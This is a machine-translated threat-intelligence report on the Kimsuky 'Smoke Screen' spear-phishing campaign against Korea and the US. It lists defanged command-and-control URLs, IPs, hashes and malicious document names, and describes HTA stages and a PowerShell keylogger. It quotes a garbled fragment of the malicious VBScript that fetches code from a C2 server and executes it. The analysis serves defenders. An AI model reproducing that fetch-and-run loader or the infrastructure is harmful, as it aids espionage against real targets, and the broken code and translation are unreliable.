#1255063: Kimsuky unveils APT campaign 'Smoke Screen' aimed at Korea and America

Description: https://translate.google.com/translate?hl=nl&sl=auto&tl=en&u=https%3A%2F%2Fblog.alyac.co.kr%2F2243

At ESRC, we discovered that a spear phishing attack was conducted on April 11th in Korea for people involved in North Korea-related fields.

This was revealed as an extension of APT attack on 'Operation Stealth Power' operation, which was spread on April 03, [recent trends of major countries related to the Korean peninsula] and [3.17 Secret Security Summit of United States] It turned out to be the same organization behind the Korea Hydro & Nuclear Power (KHNP) hacking attack .

[English Version]

Analysis of the APT Campaign 'Smoke Screen' targeting to Korea and US

Smoke Screen.pdf


[Picture 1] Attack image of government official's remarks about Han Mi-jeong meeting

The attacker is misleading the recipient under the heading 'Remarks by government officials related to the Han Mi-jeong' meeting, and has attached a malicious file named "
hwp Malicious document files have been circulated encrypted and the EPS vulnerability will not work if you do not enter a password.
When a document file vulnerability is triggered, it attempts to communicate with a specific command control (C2) server in Korea and loads the file 'first.hta'. The VBScript code contained within the HTML application host is then executed

The malicious script code goes through Stages 1-3 of the following steps, runs a PowerShell-based keylogger, and secretly collects information from the infected computer. And register it in the registry and perform spy function by C2 communication only.

- http://naban.co [.] kr / mobile / skin / member / ctml / v / first.hta

- http://naban.co [.] kr / mobile / skin / member / ctml / v / expres.php? op = 1

- http://naban.co [.] kr / mobile / skin / member / ctml / v / upload.php

- http://naban.co [.] kr / mobile / skin / member / ctml / v / Second.hta

- http://naban.co [.] kr / mobile / skin / member / ctml / v / expres.php? op = 2

- http://naban.co [.] kr / mobile / skin / member / ctml / v / upload.php

- http://naban.co [.] kr / mobile / skin / member / ctml / v / keylogger1.ps1 -> ktmp.log


For reference, there are common features that the servers used in the attack are connected to the IP of the specific server in Korea .

- naban.co [.] kr ( 110.4.107 [.] 244)

- jmable.mireene [.] com ( 110.4.107 [.] 244)

- itoassn.mireene [.] com ( 110.4.107 [.] 244)

- jmdesign.mireene [.] com ( 110.4.107 [.] 244)

When the malicious HWP document is executed, it includes the title and contents of 'Government Official Remarks (20190409) related to the Korea-US summit meeting'. And the document is registered with the same 'Tom' account as the existing 'Stealth Power' operation.

[Fig. 1-1] Screen to show after execution of malicious HWP and 'Tom' account

Meanwhile, a malicious document file named 'TaskForceReport.doc' which was created at 05:15 pm (KST) on April 01, 2019 was observed overseas .

At ESRC, this malicious DOC document file has caught up with recent incidents involving specific violations in South Korea and the United States, and the threat organization is believed to be actively involved in targeted and targeted attacks at home and abroad.

Interestingly, the series of malicious code used in this APT attack is based on the Kimsuky organization, Operation Stealth Power Silent Operation (2019-04-30) and a huge campaign of baby campaign series It is connected directly or indirectly with the upcoming special giant 'Operation Giant Baby' (2019-03-28) .

From the end of March to the beginning of April, all malicious HWP document files found in Korea were exploited by the same vulnerability attack method, and the account name that created the document file also matches 'Tom'.

[Fig. 1-2] HWP malicious document file metadata screen

■ Camouflage tactics and ghosts of smoke screening, "Campaign smokescreen" background

'TaskForceReport.doc' Malicious files were first reported abroad, but the document itself was written in Korean, and there are many similar variants.

Malicious file creators used unique Windows accounts such as 'windowsmb', 'JamFedura', 'Aji', 'DefaultAcount', 'yer', 'Roberts Brad', etc., We are also involved in the development of related programs.

Some accounts are registered with Kakao Talk in Korea and use messenger services such as Telegram and Skype.

ESRC believes that there are 'state-sponsored actors' behind this APT attack through comprehensive judgments, and they speak Korean and English freely, disguised as foreign fake profile photographs. We named it "Campaign Smoke Screen" because we spotted the fact that it is stealthy .

In 2014, the threat organization classified as Hacking Hacking in 2014 participates in APT attacks in Korea and the US . In Korea, HWP document file vulnerability is exploited, and overseas, using a DOC document file vulnerability, It was revealed.

■ DOC-based APT attack strategy tactics and threat vector analysis

'TaskForceReport.doc' (MD5: d400adcd06e0a07549e2465c9c500c45) which was produced on April 01, 2019 The malicious document file was distributed through the following address.
- tdalpacafarm [.] com / wp-includes / Text / Diff / common / doc.php

This server has already reported 'Oct_Bld_full_view.docm' (MD5: 1a6f9190e7c53cd4e9ca4532547131af) malicious document as C2 and Palo Alto Networks Unit 42 team as ' New BabyShark Malware Targets US National Security Think Tanks '.

The following VBA code was used at the time.

Sub change_words (ByVal findWord, ByVal replaceWord)


If the code 'Vkggy0.hta' in the code above is loaded normally, it will receive an HTTP GET response by an internal VBScript command and execute additional PowerShell commands serially.

Malicious document files found this time also have the same sequence flow.

First, when the malicious document file is executed, a security warning message is displayed to prevent the active content from being executed.


[Figure 2] Screen to be displayed after execution of malicious document written in Korean language

The malicious document contains 'activeX1.bin' to 'activeX10.bin' files. Among them, the 'activeX2.bin' file contains the communication host address as follows, and the additional C2 by HTA command and condition Communication will be attempted.

- https: // tdalpacafarm [.] com // wp-includes / Text / Diff / common / Htqgf0.hta

- https: // tdalpacafarm [.] com // wp-includes / Text / Diff / common / expres.php? op = 1

- https: // tdalpacafarm [.] com // wp-includes / Text / Diff / common / cow.php? op = exe.gif

- https: // tdalpacafarm [.] com // wp-includes / Text / Diff / common / cow.php? op = cow.gif

[Figure 3] Inside code screen of 'activeX2.bin' file

'TaskForceReport.doc' (MD5: 0f77143ce98d0b9f69c802789e3b1713) Among other variants distributed with the same name as the file, there is a history that was circulated in March.

- https: // christinadudley [.] com / public_html / includes / common / Qfnaq0.hta

- https: // christinadudley [.] com / public_html / includes / common / expres.php? op = 1

- https: // christinadudley [.] com / public_html / includes / common / cow.php? op = Normal.src

- https: // christinadudley [.] com / public_html / includes / common / Normal.src

- https: // christinadudley [.] com / public_html / includes / common / cow.php? op = exe.gif

- https: // christinadudley [.] com / public_html / includes / common / cow.php? op = cow.gif

The C2 domain used was the christinadudley [.] Com site.

The file 'Qfnaq0.hta' contains the following script code, which will load the 'expres.php? Op = 1' code via the decoding key and the routine.


(d): For i = 0 To d-1: For ix = 0 To Int ((c) (L / d) * d): Co 00 = s: Right: c = L / d) -1: s = s & Mid (c, ix * d + jx + 1,1) End Function: Set PostO = CreateObject ("MSXML2.ServerXMLHTTP.6.0"): Post0.open "GET", "https: // christinadudley [.] Com / public_html / includes / common / expres.php? F0: Execute (t0): window.close () </ script> </ html>

The file 'exe.gif' which is finally distributed at the time is encoded with BASE64 code, and when it is decoded, it is converted into 32 bit EXE format malicious code.


If you look at the HTA script used in the DOC attack vector, you can see the case of 'Operation Stealth Power' threat based on HWP malicious document that occurred on March 31 and April 1 in Korea and this 'Smoke Screen' 'You can see that the script format is similar.

The function of the PowerShell-based key logging function (function Start-KeyLogger) installed in the HWP malicious document was also used in the same way as the DOC malicious document series.
The threat organization uses the HWP document vulnerability in Korea APT attack and the malicious DOC document in foreign country.
More info: https://blog.alyac.co.kr/2243

Date added April 17, 2019, 5:57 p.m.
Source Alyac
Subjects
  • All New Malware or Attack Alerts - New Reports / IOCs in
  • Alpaca Forms
  • . APTs - Advanced Persistent Threats - New Reports in
  • Spear Phishing / spearphishing / Angler Phishing / Whaling / CEO Fraud / W2 Fraud